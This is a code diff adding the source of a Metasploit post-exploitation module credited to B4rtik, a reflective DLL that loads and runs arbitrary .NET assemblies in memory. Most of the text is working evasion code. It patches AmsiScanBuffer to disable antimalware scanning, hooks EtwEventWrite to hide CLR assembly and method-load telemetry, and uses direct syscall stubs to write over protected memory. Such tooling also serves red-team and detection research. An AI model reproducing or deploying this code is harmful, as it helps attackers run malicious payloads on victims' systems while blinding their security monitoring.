+EXTERN_C NTSTATUS ZwWriteVirtualMemory80(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToWrite, PSIZE_T NumberOfBytesWritten);
+
+
+// Windows 8.1 / Server 2012 R2 specific Syscalls
+EXTERN_C NTSTATUS ZwProtectVirtualMemory81(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);
+EXTERN_C NTSTATUS ZwReadVirtualMemory81(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
+EXTERN_C NTSTATUS ZwWriteVirtualMemory81(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToWrite, PSIZE_T NumberOfBytesWritten);
+
+
+// Windows 10 / Server 2016 specific Syscalls
+EXTERN_C NTSTATUS ZwProtectVirtualMemory10(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);
+EXTERN_C NTSTATUS ZwReadVirtualMemory10(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
+EXTERN_C NTSTATUS ZwWriteVirtualMemory10(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToWrite, PSIZE_T NumberOfBytesWritten);
+
+NTSTATUS(*ZwProtectVirtualMemory)(
+	IN HANDLE ProcessHandle,
+	IN PVOID* BaseAddress,
+	IN SIZE_T* NumberOfBytesToProtect,
+	IN ULONG NewAccessProtection,
+	OUT PULONG OldAccessProtection
+	);
+
+NTSTATUS(*ZwReadVirtualMemory)(
+	HANDLE hProcess,
+	PVOID lpBaseAddress,
+	PVOID lpBuffer,
+	SIZE_T NumberOfBytesToRead,
+	PSIZE_T NumberOfBytesRead
+	);
+
+NTSTATUS(*ZwWriteVirtualMemory)(
+	HANDLE hProcess,
+	PVOID lpBaseAddress,
+	PVOID lpBuffer,
+	SIZE_T NumberOfBytesToWrite,
+	PSIZE_T NumberOfBytesWritten
+	);
+
+ULONG NTAPI MyEtwEventWrite(
+	__in REGHANDLE RegHandle,
+	__in PCEVENT_DESCRIPTOR EventDescriptor,
+	__in ULONG UserDataCount,
+	__in_ecount_opt(UserDataCount) PEVENT_DATA_DESCRIPTOR UserData);
+
+BOOL PatchEtw();
@@ -0,0 +1,31 @@
+// Author: B4rtik (@b4rtik)
+// Project: Execute-dotnet-assembly (https://github.com/b4rtik/metasploit-execute-assembly)
+// License: BSD 3-Clause
+
+#include "stdafx.h"
+#include "ReflectiveLoader.h"
+#include "HostingCLR.h"
+
+extern HINSTANCE hAppInstance;
+
+BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
+{
+	BOOL bReturnValue = TRUE;
+	switch (dwReason)
+	{
+	case DLL_QUERY_HMODULE:
+		if (lpReserved != NULL)
+			*(HMODULE *)lpReserved = hAppInstance;
+		break;
+	case DLL_PROCESS_ATTACH:
+		hAppInstance = hinstDLL;
+		Execute(lpReserved);
+		fflush(stdout);
+		break;
+	case DLL_PROCESS_DETACH:
+	case DLL_THREAD_ATTACH:
+	case DLL_THREAD_DETACH:
+		break;
+	}
+	return bReturnValue;
+}
@@ -0,0 +1,514 @@
+// Author: B4rtik (@b4rtik)
+// Project: Execute Assembly (https://github.com/b4rtik/metasploit-execute-assembly)
+// License: BSD 3-Clause
+// based on 
+// https://github.com/etormadiv/HostingCLR
+// by Etor Madiv
+
+#include "stdafx.h"
+#include <stdio.h>
+#include <windows.h>
+#include <evntprov.h>
+#include "HostingCLR.h"
+#include "EtwTamper.h"
+
+// https://docs.microsoft.com/en-us/dotnet/framework/performance/etw-events-in-the-common-language-runtime
+#define ModuleLoad_V2 152
+#define AssemblyDCStart_V1 155
+#define MethodLoadVerbose_V1 143
+#define MethodJittingStarted 145
+#define ILStubGenerated 88
+
+unsigned char amsiflag[1];
+unsigned char etwflag[1];
+
+char sig_40[] = { 0x76,0x34,0x2E,0x30,0x2E,0x33,0x30,0x33,0x31,0x39 };
+char sig_20[] = { 0x76,0x32,0x2E,0x30,0x2E,0x35,0x30,0x37,0x32,0x37 };
+
+// mov rax, <Hooked function address>  
+// jmp rax
+unsigned char uHook[] = {
+	0x48, 0xb8, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+	0xFF, 0xE0
+};
+
+#ifdef _X32
+unsigned char amsipatch[] = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };
+SIZE_T patchsize = 8;
+#endif
+#ifdef _X64
+unsigned char amsipatch[] = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
+SIZE_T patchsize = 6;
+#endif
+
+union PARAMSIZE {
+	unsigned char myByte[4];
+	int intvalue;
+} paramsize;
+
+int executeSharp(LPVOID lpPayload)
+{
+	HRESULT hr;
+
+	ICLRMetaHost* pMetaHost = NULL;
+	ICLRRuntimeInfo* pRuntimeInfo = NULL;
+	BOOL bLoadable;
+	ICorRuntimeHost* pRuntimeHost = NULL;
+	IUnknownPtr pAppDomainThunk = NULL;
+	_AppDomainPtr pDefaultAppDomain = NULL;
+	_AssemblyPtr pAssembly = NULL;
+	SAFEARRAYBOUND rgsabound[1];
+	SIZE_T readed;
+	_MethodInfoPtr pMethodInfo = NULL;
+	VARIANT retVal;
+	VARIANT obj;
+	SAFEARRAY *psaStaticMethodArgs;
+	VARIANT vtPsa;
+
+	unsigned char pSize[8];
+
+	//Read parameters assemblysize + argssize
+	ReadProcessMemory(GetCurrentProcess(), lpPayload, pSize, 8, &readed);
+
+	PARAMSIZE assemblysize;
+	assemblysize.myByte[0] = pSize[0];
+	assemblysize.myByte[1] = pSize[1];
+	assemblysize.myByte[2] = pSize[2];
+	assemblysize.myByte[3] = pSize[3];
+
+	PARAMSIZE argssize;
+	argssize.myByte[0] = pSize[4];
+	argssize.myByte[1] = pSize[5];
+	argssize.myByte[2] = pSize[6];
+	argssize.myByte[3] = pSize[7];
+
+	long raw_assembly_length = assemblysize.intvalue;
+	long raw_args_length = argssize.intvalue;
+
+	unsigned char *allData = (unsigned char*)malloc(raw_assembly_length * sizeof(unsigned char)+ raw_args_length * sizeof(unsigned char) + 9 * sizeof(unsigned char));
+	unsigned char *arg_s = (unsigned char*)malloc(raw_args_length * sizeof(unsigned char));
+	unsigned char *rawData = (unsigned char*)malloc(raw_assembly_length * sizeof(unsigned char));
+
+	SecureZeroMemory(allData, raw_assembly_length * sizeof(unsigned char) + raw_args_length * sizeof(unsigned char) + 9 * sizeof(unsigned char));
+	SecureZeroMemory(arg_s, raw_args_length * sizeof(unsigned char));
+	SecureZeroMemory(rawData, raw_assembly_length * sizeof(unsigned char));
+
+	rgsabound[0].cElements = raw_assembly_length;
+	rgsabound[0].lLbound = 0;
+	SAFEARRAY* pSafeArray = SafeArrayCreate(VT_UI1, 1, rgsabound);
+
+	void* pvData = NULL;
+	hr = SafeArrayAccessData(pSafeArray, &pvData);
+
+	if (FAILED(hr))
+	{
+		printf("Failed SafeArrayAccessData w/hr 0x%08lx\n", hr);
+		return -1;
+	}
+	
+	//Reading memory parameters + amsiflag + args + assembly
+	ReadProcessMemory(GetCurrentProcess(), lpPayload , allData, raw_assembly_length + raw_args_length + 9, &readed);
+
+	//Taking pointer to amsi
+	unsigned char *offsetamsi = allData + 8;
+	//Store amsi flag 
+	memcpy(amsiflag, offsetamsi, 1);
+
+	unsigned char *offsetetw = allData + 9;
+	//Store amsi flag 
+	memcpy(etwflag, offsetetw, 1);
+	
+	//Taking pointer to args
+	unsigned char *offsetargs = allData + 10;
+	//Store parameters 
+	memcpy(arg_s, offsetargs, raw_args_length);
+
+	//Taking pointer to assembly
+	unsigned char *offset = allData + raw_args_length + 10;
+	//Store assembly
+	memcpy(pvData, offset, raw_assembly_length);
+
+	LPCWSTR clrVersion;
+	
+	if(FindVersion(pvData, raw_assembly_length))
+	{
+		clrVersion = L"v4.0.30319";
+	}
+	else
+	{
+		clrVersion = L"v2.0.50727";
+	}
+
+	hr = SafeArrayUnaccessData(pSafeArray);
+
+	if (FAILED(hr))
+	{
+		printf("Failed SafeArrayUnaccessData w/hr 0x%08lx\n", hr);
+		return -1;
+	}
+
+	//Etw bypass
+	if (etwflag[0] == '\x01')
+	{
+		int ptcResult = PatchEtw();
+		if (ptcResult == -1)
+		{
+			printf("Etw bypass failed\n");
+			return -1;
+		}
+	}
+
+	hr = CLRCreateInstance(CLSID_CLRMetaHost, IID_ICLRMetaHost, (VOID**)&pMetaHost);
+
+	if(FAILED(hr))
+	{
+		printf("CLRCreateInstance failed w/hr 0x%08lx\n", hr);
+		return -1;
+	}
+
+	IEnumUnknown* pEnumerator;
+	HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, GetCurrentProcessId());
+	hr = pMetaHost->EnumerateLoadedRuntimes(hProcess, &pEnumerator);
+
+	if (FAILED(hr))
+	{
+		printf("Cannot enumerate loaded runtime w/hr 0x%08lx\n", hr);
+		return -1;
+	}
+	
+	BOOL isloaded = ClrIsLoaded(clrVersion, pEnumerator, (VOID**)&pRuntimeInfo);
+
+	if(!isloaded)
+	{
+		hr = pMetaHost->GetRuntime(clrVersion, IID_ICLRRuntimeInfo, (VOID**)&pRuntimeInfo);
+
+		if (FAILED(hr))
+		{
+			wprintf(L"Cannot get the required CLR version (%s) w/hr 0x%08lx\n", clrVersion, hr);
+			return -1;
+		}
+
+		hr = pRuntimeInfo->IsLoadable(&bLoadable);
+
+		if (FAILED(hr) || !bLoadable)
+		{
+			wprintf(L"Cannot load the required CLR version (%s) w/hr 0x%08lx\n", clrVersion, hr);
+			return -1;
+		}
+	}
+
+	hr = pRuntimeInfo->GetInterface(CLSID_CorRuntimeHost, IID_ICorRuntimeHost, (VOID**)&pRuntimeHost);
+
+	if(FAILED(hr))
+	{
+		printf("ICLRRuntimeInfo::GetInterface failed w/hr 0x%08lx\n", hr);
+		return -1;
+	}
+
+	if (!isloaded)
+	{
+		hr = pRuntimeHost->Start();
+	}
+
+	if(FAILED(hr))
+	{
+		printf("CLR failed to start w/hr 0x%08lx\n", hr);
+		return -1;
+	}
+
+	hr = pRuntimeHost->GetDefaultDomain(&pAppDomainThunk);
+
+	if(FAILED(hr))
+	{
+		printf("ICorRuntimeHost::GetDefaultDomain failed w/hr 0x%08lx\n", hr);
+		return -1;
+	}
+
+	hr = pAppDomainThunk->QueryInterface(__uuidof(_AppDomain), (VOID**) &pDefaultAppDomain);
+
+	if(FAILED(hr))
+	{
+		printf("Failed to get default AppDomain w/hr 0x%08lx\n", hr);
+		return -1;
+	}
+
+	//Amsi bypass
+	if (amsiflag[0] == '\x01')
+	{
+		int ptcResult = PatchAmsi();
+		if (ptcResult == -1)
+		{
+			printf("Amsi bypass failed\n");
+			return -1;
+		}
+	}
+
+	hr = pDefaultAppDomain->Load_3(pSafeArray, &pAssembly);
+
+	if(FAILED(hr))
+	{
+		printf("Failed pDefaultAppDomain->Load_3 w/hr 0x%08lx\n", hr);
+		return -1;
+	}
+
+	hr = pAssembly->get_EntryPoint(&pMethodInfo);
+
+	if(FAILED(hr))
+	{
+		printf("Failed pAssembly->get_EntryPoint w/hr 0x%08lx\n", hr);
+		return -1;
+	}
+
+	ZeroMemory(&retVal, sizeof(VARIANT));
+	ZeroMemory(&obj, sizeof(VARIANT));
+	
+	obj.vt = VT_NULL;
+	vtPsa.vt = (VT_ARRAY | VT_BSTR);
+
+	//Managing parameters
+	if(arg_s[0] != '\x00')
+	{
+		//if we have at least 1 parameter set cEleemnt to 1
+		psaStaticMethodArgs = SafeArrayCreateVector(VT_VARIANT, 0, 1);
+
+		LPWSTR *szArglist;
+		int nArgs;
+		wchar_t *wtext = (wchar_t *)malloc((sizeof(wchar_t) * raw_args_length +1));
+
+		mbstowcs(wtext, (char *)arg_s, raw_args_length + 1);
+		szArglist = CommandLineToArgvW(wtext, &nArgs);
+
+		free(wtext);
+
+		vtPsa.parray = SafeArrayCreateVector(VT_BSTR, 0, nArgs);
+
+		for(long i = 0;i< nArgs;i++)
+		{
+			size_t converted;
+			size_t strlength = wcslen(szArglist[i]) + 1;
+			OLECHAR *sOleText1 = new OLECHAR[strlength];
+			char * buffer = (char *)malloc(strlength * sizeof(char));
+			
+			wcstombs(buffer, szArglist[i], strlength);
+			
+			mbstowcs_s(&converted, sOleText1, strlength, buffer, strlength);
+			BSTR strParam1 = SysAllocString(sOleText1);
+
+			SafeArrayPutElement(vtPsa.parray, &i, strParam1);
+			free(buffer);
+		}
+
+		long iEventCdIdx(0);
+		hr = SafeArrayPutElement(psaStaticMethodArgs, &iEventCdIdx, &vtPsa);
+	}
+	else
+	{
+		//if no parameters set cEleemnt to 0
+		psaStaticMethodArgs = SafeArrayCreateVector(VT_VARIANT, 0, 0);
+	}
+	
+	//Assembly execution
+	hr = pMethodInfo->Invoke_3(obj, psaStaticMethodArgs, &retVal);
+
+	if(FAILED(hr))
+	{
+		printf("Failed pMethodInfo->Invoke_3  w/hr 0x%08lx\n", hr);
+		return -1;
+	}
+
+	wprintf(L"Succeeded\n");
+	
+	return 0;
+}
+
+VOID Execute(LPVOID lpPayload)
+{
+	if (!AttachConsole(-1))
+		AllocConsole();
+
+	executeSharp(lpPayload);
+
+}
+
+BOOL FindVersion(void * assembly, int length)
+{
+	char* assembly_c;
+	assembly_c = (char*)assembly;
+	
+	for (int i = 0; i < length; i++)
+	{
+		for (int j = 0; j < 10; j++)
+		{
+			if (sig_40[j] != assembly_c[i + j])
+			{
+				break;
+			}
+			else
+			{
+				if (j == (9))
+				{
+					return TRUE;
+				}
+			}
+		}
+	}
+
+	return FALSE;
+}
+
+ULONG NTAPI MyEtwEventWrite(
+	__in REGHANDLE RegHandle,
+	__in PCEVENT_DESCRIPTOR EventDescriptor,
+	__in ULONG UserDataCount,
+	__in_ecount_opt(UserDataCount) PEVENT_DATA_DESCRIPTOR UserData)
+{
+	ULONG uResult = 0;
+
+	_EtwEventWriteFull EtwEventWriteFull = (_EtwEventWriteFull)
+		GetProcAddress(GetModuleHandle("ntdll.dll"), "EtwEventWriteFull");
+	if (EtwEventWriteFull == NULL) {
+		return 1;
+	}
+
+	switch (EventDescriptor->Id) {
+	case AssemblyDCStart_V1:
+		// Block CLR assembly loading events.
+		break;
+	case MethodLoadVerbose_V1:
+		// Block CLR method loading events.
+		break;
+	case ILStubGenerated:
+		// Block MSIL stub generation events.
+		break;
+	default:
+		// Forward all other ETW events using EtwEventWriteFull.
+		uResult = EtwEventWriteFull(RegHandle, EventDescriptor, 0, NULL, NULL, UserDataCount, UserData);
+	}
+
+	return uResult;
+}
+
+INT InlinePatch(LPVOID lpFuncAddress, UCHAR * patch) {
+	PNT_TIB pTIB = NULL;
+	PTEB pTEB = NULL;
+	PPEB pPEB = NULL;
+
+	// Get pointer to the TEB
+	pTIB = (PNT_TIB)__readgsqword(0x30);
+	pTEB = (PTEB)pTIB->Self;
+
+	// Get pointer to the PEB
+	pPEB = (PPEB)pTEB->ProcessEnvironmentBlock;
+	if (pPEB == NULL) {
+		return -1;
+	}
+
+	if (pPEB->OSMajorVersion == 10 && pPEB->OSMinorVersion == 0) {
+		ZwProtectVirtualMemory = &ZwProtectVirtualMemory10;
+		ZwWriteVirtualMemory = &ZwWriteVirtualMemory10;
+	}
+	else if (pPEB->OSMajorVersion == 6 && pPEB->OSMinorVersion == 1 && pPEB->OSBuildNumber == 7601) {
+		ZwProtectVirtualMemory = &ZwProtectVirtualMemory7SP1;
+		ZwWriteVirtualMemory = &ZwWriteVirtualMemory7SP1;
+	}
+	else if (pPEB->OSMajorVersion == 6 && pPEB->OSMinorVersion == 2) {
+		ZwProtectVirtualMemory = &ZwProtectVirtualMemory80;
+		ZwWriteVirtualMemory = &ZwWriteVirtualMemory80;
+	}
+	else if (pPEB->OSMajorVersion == 6 && pPEB->OSMinorVersion == 3) {
+		ZwProtectVirtualMemory = &ZwProtectVirtualMemory81;
+		ZwWriteVirtualMemory = &ZwWriteVirtualMemory81;
+	}
+	else {
+
+		return -2;
+	}
+
+	LPVOID lpBaseAddress = lpFuncAddress;
+	ULONG OldProtection, NewProtection;
+	SIZE_T uSize = sizeof(patch);
+	NTSTATUS status = ZwProtectVirtualMemory(NtCurrentProcess(), &lpBaseAddress, &uSize, PAGE_EXECUTE_READWRITE, &OldProtection);
+	if (status != STATUS_SUCCESS) {
+		return -1;
+	}
+
+	status = ZwWriteVirtualMemory(NtCurrentProcess(), lpFuncAddress, (PVOID)patch, sizeof(patch), NULL);
+	if (status != STATUS_SUCCESS) {
+		return -1;
+	}
+
+	status = ZwProtectVirtualMemory(NtCurrentProcess(), &lpBaseAddress, &uSize, OldProtection, &NewProtection);
+	if (status != STATUS_SUCCESS) {
+		return -1;
+	}
+
+	return 0;
+}
+
+BOOL PatchEtw()
+{
+	HMODULE lib = LoadLibraryA("ntdll.dll");
+	if (lib == NULL)
+	{
+		printf("Cannot load ntdll.dll");
+		return -2;
+	}
+	LPVOID lpFuncAddress = GetProcAddress(lib, "EtwEventWrite");
+	if (lpFuncAddress == NULL)
+	{
+		printf("Cannot get address of EtwEventWrite");
+		return -2;
+	}
+
+	// Add address of hook function to patch.
+	*(DWORD64*)&uHook[2] = (DWORD64)MyEtwEventWrite;
+
+	return InlinePatch(lpFuncAddress, uHook);
+}
+
+BOOL PatchAmsi()
+{
+
+	HMODULE lib = LoadLibraryA("amsi.dll");
+	if (lib == NULL)
+	{
+		printf("Cannot load amsi.dll");
+		return -2;
+	}
+
+	LPVOID addr = GetProcAddress(lib, "AmsiScanBuffer");
+	if(addr == NULL)
+	{
+		printf("Cannot get address of AmsiScanBuffer");
+		return -2;
+	}
+
+	return InlinePatch(addr, amsipatch);
+}
+
+BOOL ClrIsLoaded(LPCWSTR version, IEnumUnknown* pEnumerator, LPVOID * pRuntimeInfo) {
+	HRESULT hr;
+	ULONG fetched = 0;
+	DWORD vbSize;
+	BOOL retval = FALSE;
+	wchar_t currentversion[260];
+
+	while (SUCCEEDED(pEnumerator->Next(1, (IUnknown **)&pRuntimeInfo, &fetched)) && fetched > 0) 
+	{
+		hr = ((ICLRRuntimeInfo*)pRuntimeInfo)->GetVersionString(currentversion, &vbSize);
+		if (!FAILED(hr))
+		{
+			if (wcscmp(currentversion, version) == 0)
+			{
+				retval = TRUE;
+				break;
+			}
+		}
+	}
+
+	return retval;
+}
+
+
+
+
@@ -0,0 +1,23 @@
+#pragma once
+#include <io.h>
+#include <stdio.h>
+#include <tchar.h>
+#include <metahost.h>
+
+
+#pragma comment(lib, "MSCorEE.lib")
+
+#import "mscorlib.tlb" raw_interfaces_only				\
+    high_property_prefixes("_get","_put","_putref")		\
+    rename("ReportEvent", "InteropServices_ReportEvent")
+
+#define STATUS_SUCCESS 0
+#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 )
+
+using namespace mscorlib;
+
+VOID Execute(LPVOID lpPayload);
+BOOL FindVersion(void * assembly, int length);
+BOOL PatchAmsi();
+BOOL ClrIsLoaded(LPCWSTR versione, IEnumUnknown* pEnumerator, LPVOID * pRuntimeInfo);
+INT InlinePatch(LPVOID lpFuncAddress, UCHAR * patch);
@@ -0,0 +1,178 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{C5ADDA72-8591-417A-BCE3-279EC6960FE2}</ProjectGuid>
+    <Keyword>Win32Proj</Keyword>
+    <RootNamespace>HostingCLR</RootNamespace>
+    <WindowsTargetPlatformVersion>7.0</WindowsTargetPlatformVersion>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>MultiByte</CharacterSet>
+    <PlatformToolset>v140_xp</PlatformToolset>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>MultiByte</CharacterSet>
+    <PlatformToolset>v140_xp</PlatformToolset>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>MultiByte</CharacterSet>
+    <PlatformToolset>v140_xp</PlatformToolset>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>MultiByte</CharacterSet>
+    <PlatformToolset>v140_xp</PlatformToolset>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+    <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+    <TargetName>$(ProjectName)$(Platform)</TargetName>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+    <TargetName>$(ProjectName)$(Platform)</TargetName>
+    <OutDir>..\..\..\..\data\post\execute-dotnet-assembly</OutDir>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>_X32;WIN32;NDEBUG;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <AdditionalLibraryDirectories>C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\lib\amd64</AdditionalLibraryDirectories>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>_X64;WIN32;NDEBUG;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <CompileAs>Default</CompileAs>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <AdditionalLibraryDirectories>C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\lib\amd64</AdditionalLibraryDirectories>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClInclude Include="EtwTamper.h" />
+    <ClInclude Include="HostingCLR.h" />
+    <ClInclude Include="ReflectiveDLLInjection.h" />
+    <ClInclude Include="ReflectiveLoader.h" />
+    <ClInclude Include="stdafx.h" />
+    <ClInclude Include="targetver.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="Executer.cpp" />
+    <ClCompile Include="HostingCLR.cpp" />
+    <ClCompile Include="ReflectiveLoader.cpp" />
+    <ClCompile Include="stdafx.cpp">
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <MASM Include="Syscalls.asm">
+      <FileType>Document</FileType>
+      <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</ExcludedFromBuild>
+    </MASM>
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+    <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
+  </ImportGroup>
+</Project>
@@ -0,0 +1,56 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Sources">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
